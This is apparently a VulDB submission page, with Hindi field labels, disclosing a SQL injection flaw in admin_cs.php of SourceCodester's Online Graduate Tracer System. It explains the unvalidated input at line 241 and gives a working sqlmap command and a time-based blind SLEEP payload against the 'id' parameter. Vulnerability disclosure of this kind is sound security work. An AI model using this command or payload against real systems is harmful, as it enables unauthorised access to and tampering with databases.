| शीर्षक | SourceCodester Online Graduate Tracer System admin_cs.php sql injection |
|---|
| विवरण | SourceCodester Online Graduate Tracer System admin_cs.php sql injection
url:tracking/admin/admin_cs.php
Abstract:
Line 241 of admin_cs.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.
Explanation:
SQL injection errors occur when:
Data enters a program from an untrusted source.
The data is used to dynamically construct a SQL query.
In this case the data is passed to mysqli_query() in admin_cs.php at line 241.
sqlmap.py -u http://127.0.0.1/shenji/tracking/admin/admin_cs.php?id=1111 --current-db
Parameter: id (GET)
Type: time-based blind
Title: MYSQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id:1111'AND (SELECT 5126 FROM (SELECT(SLEEP(5)))BFUF) ANDIgBK':'IgBK
Download Code:
https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html |
|---|
| स्रोत | ⚠️ https://blog.csdn.net/weixin_43864034/article/details/129418770 |
|---|
| उपयोगकर्ता | bit3hh (UID 42576) |
|---|
| सबमिशन | 09/03/2023 04:54 AM (3 साल पहले) |
|---|
| संयम | 09/03/2023 03:30 PM (11 hours later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 222647 [SourceCodester Online Graduate Tracer System 1.0 admin_cs.php mysqli_query SQL इंजेक्शन] |
|---|
| अंक | 20 |
|---|